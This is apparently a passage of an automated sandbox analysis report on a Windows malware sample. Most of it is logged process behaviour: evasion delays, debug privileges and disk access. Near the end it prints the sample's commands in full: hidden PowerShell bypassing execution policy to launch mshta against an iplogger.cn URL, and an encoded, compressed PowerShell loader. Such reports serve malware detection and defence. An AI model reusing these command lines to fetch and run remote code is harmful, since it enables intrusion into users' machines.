Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899875	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899766	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899641	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899531	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3046	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3306	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5593	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4218	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3914	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5830	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7760	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep count: 3914 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep count: 5830 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -899875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -899766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -899641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -899531s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899875	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899766	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899641	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899531	Jump to behavior

Source: mshta.exe, 00000002.00000002.2087019154.000001B148900000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2086942294.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2086050795.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000006.00000002.1389805083.0000000007845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"

Encrypted powershell cmdline option found

Source: C:\Windows\System32\mshta.exe	Process created: Base64 decoded $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/61Xa3OizBL+HH8FH1KlVkwOxMvqnkrVIhfFAJGLl5g3lUIYERkBYRDJu/vfT4OazZ5Nztmqc6yiHGamu59+prunMRC5Nkjs2UQJHURdT1GceGFA3VYql1vLRx5JQuqO+latrNLAJsVSMXhxEXmJ4tB+sRwnRklC/V25GFuxtaVql3srftmGTopRgypfio3ISWNUv7ioXJRTaZBYK/QSWMTbo5ctIuvQScBQ7YmNIj7cWl7w/PUrl8YxCsjx/WaACJskaLvEHkpqdeo7NVujGF0/LDfIJtTf1OXLzQCHSwuftuWcZa/BKTZwijU5tK3Cgxsjwh6pVf/6q1p/umaeb4RdauGkVjXyhKDtjYNxtU79qBcGzTxCtari2XGYhCtyM/OC5u3NpESvluCVI/Zq/eSZG1ngx+dOFlqPMrUqDMfADXvksNqgngp7T8/P1Lc3NHoaEG+LbqSAoDiMDBTvPRslN0MrcDDS0QrEqgkcYeBW6wAiRiSNA+qMBeT2oY9ql0GKcQP0Pv2p3ueairIzuX8qVHsvBLvGJK43TjHxJ3QoZdwc1YE7v6F/F1x1+P0WYPXKj8oHoeogjFyLoBcC/L6L1crFxVM5ROBPbRwmXil3R9ENSgEQFgnjvDhOM05R/fnn+RzNniWTxqeKmLPUSeZ4PEccd9TTNPSc58pFvXKKnmL+ZZl62EFxsf55NvBo5QWIzwNr69nngK99dGZohVHJx815mwo4a9XTAnL4EzvVgtCn38WErUfeZPtHcKwN554AKgiJ+q9gjmdYq0qBgrbA3/EdwvRyBWmGzrtPqZWfrRfvRSxz2EqSBjVOIc/tBmUgCyOnQbFB4p2W2JSE5bD6E66SYuLZVkLO6p7rH1B6Ms2FAWRMasPpAg2mESHbs3DBSoMaeg7q54bnniFUP+SEszCGlANNezgTmCm4MEgRM7HT+Pf4qN8YiEjbCKMt7C6rkIgtF2rOKaPKcLNc5FT/A+xznhyTouDqTNI70BAABg5Jg5p6MYG6Vm38Fnj/G7xfS8wvMLkYnQ6yVibiUz8nRbpc7l/s4nq5e2Oy5C0mwJkYh9u+laBOyyiLWK3a7KY7KVc2WiceCHtxuBsKJjx7eJo7UZDlkR71ddkW0ofxkB6tJK3Lt9IslVKzTzdFGva97gbCSto/hI9Mum0xTiTtVZhLvuyGCS/teXZ4uwvFjuv1TnqO8toyY5ZzSfyyHIit4TQRi/1Dad8Xd1wvhPE/pD0XjkCu24mCfua0kDDqoLlsZ03SRZZ7yO+nVwbNDKa5Kk+FSDUCR14ymjhSX29z8An8MppDnXbgMQ6YmYWm3Ut2w8Jf1Jd3djAaScNRbvRcXsrVzKYJvYtfcXO8eM13XZBXW8DJwcgVvdVxDvZczOy5KufDR3UANnbpzG0NVTk8sBupE/OG4
Source: C:\Windows\System32\mshta.exe	Process created: Base64 decoded $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/61Xa3OizBL+HH8FH1KlVkwOxMvqnkrVIhfFAJGLl5g3lUIYERkBYRDJu/vfT4OazZ5Nztmqc6yiHGamu59+prunMRC5Nkjs2UQJHURdT1GceGFA3VYql1vLRx5JQuqO+latrNLAJsVSMXhxEXmJ4tB+sRwnRklC/V25GFuxtaVql3srftmGTopRgypfio3ISWNUv7ioXJRTaZBYK/QSWMTbo5ctIuvQScBQ7YmNIj7cWl7w/PUrl8YxCsjx/WaACJskaLvEHkpqdeo7NVujGF0/LDfIJtTf1OXLzQCHSwuftuWcZa/BKTZwijU5tK3Cgxsjwh6pVf/6q1p/umaeb4RdauGkVjXyhKDtjYNxtU79qBcGzTxCtari2XGYhCtyM/OC5u3NpESvluCVI/Zq/eSZG1ngx+dOFlqPMrUqDMfADXvksNqgngp7T8/P1Lc3NHoaEG+LbqSAoDiMDBTvPRslN0MrcDDS0QrEqgkcYeBW6wAiRiSNA+qMBeT2oY9ql0GKcQP0Pv2p3ueairIzuX8qVHsvBLvGJK43TjHxJ3QoZdwc1YE7v6F/F1x1+P0WYPXKj8oHoeogjFyLoBcC/L6L1crFxVM5ROBPbRwmXil3R9ENSgEQFgnjvDhOM05R/fnn+RzNniWTxqeKmLPUSeZ4PEccd9TTNPSc58pFvXKKnmL+ZZl62EFxsf55NvBo5QWIzwNr69nngK99dGZohVHJx815mwo4a9XTAnL4EzvVgtCn38WErUfeZPtHcKwN554AKgiJ+q9gjmdYq0qBgrbA3/EdwvRyBWmGzrtPqZWfrRfvRSxz2EqSBjVOIc/tBmUgCyOnQbFB4p2W2JSE5bD6E66SYuLZVkLO6p7rH1B6Ms2FAWRMasPpAg2mESHbs3DBSoMaeg7q54bnniFUP+SEszCGlANNezgTmCm4MEgRM7HT+Pf4qN8YiEjbCKMt7C6rkIgtF2rOKaPKcLNc5FT/A+xznhyTouDqTNI70BAABg5Jg5p6MYG6Vm38Fnj/G7xfS8wvMLkYnQ6yVibiUz8nRbpc7l/s4nq5e2Oy5C0mwJkYh9u+laBOyyiLWK3a7KY7KVc2WiceCHtxuBsKJjx7eJo7UZDlkR71ddkW0ofxkB6tJK3Lt9IslVKzTzdFGva97gbCSto/hI9Mum0xTiTtVZhLvuyGCS/teXZ4uwvFjuv1TnqO8toyY5ZzSfyyHIit4TQRi/1Dad8Xd1wvhPE/pD0XjkCu24mCfua0kDDqoLlsZ03SRZZ7yO+nVwbNDKa5Kk+FSDUCR14ymjhSX29z8An8MppDnXbgMQ6YmYWm3Ut2w8Jf1Jd3djAaScNRbvRcXsrVzKYJvYtfcXO8eM13XZBXW8DJwcgVvdVxDvZczOy5KufDR3UANnbpzG0NVTk8sBupE/OG4			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB	Jump to behavior
